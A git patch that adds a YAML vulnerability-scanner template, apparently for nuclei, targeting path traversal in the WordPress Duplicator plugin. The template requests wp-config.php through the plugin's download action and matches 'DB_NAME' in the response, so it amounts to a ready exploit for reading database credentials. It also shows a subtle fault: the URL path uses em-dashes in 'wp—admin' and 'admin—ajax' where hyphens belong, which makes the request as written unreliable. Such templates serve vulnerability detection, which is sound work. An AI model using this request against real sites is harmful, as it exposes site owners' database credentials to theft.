From fb3b4ed44d22b906cc1850ba942a571c9d524485 Mon Sep 17 00:00:00 2001
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com>
Date: Wed, 8 Apr 2020 17:43:25 +0530
Subject: [PATCH] Create WordPress duplicator Path Traversal.yaml

---
 .../WordPress duplicator Path Traversal.yaml     | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 vulnerabilities/WordPress duplicator Path Traversal.yaml

diff --git a/vulnerabilities/WordPress duplicator Path Traversal.yaml b/vulnerabilities/WordPress duplicator Path Traversal.yaml
new file mode 100644
index 0000000000..25df9d7826
--- /dev/null
+++ b/vulnerabilities/WordPress duplicator Path Traversal.yaml	
@@ -0,0 +1,16 @@
+id: WordPress duplicator Path Traversal
+
+info:
+  name: WordPress duplicator Path Traversal
+  author: madrobot
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php"
+    matchers:
+      - type: regex
+        regex:
+            - "DB_NAME"
+        part: body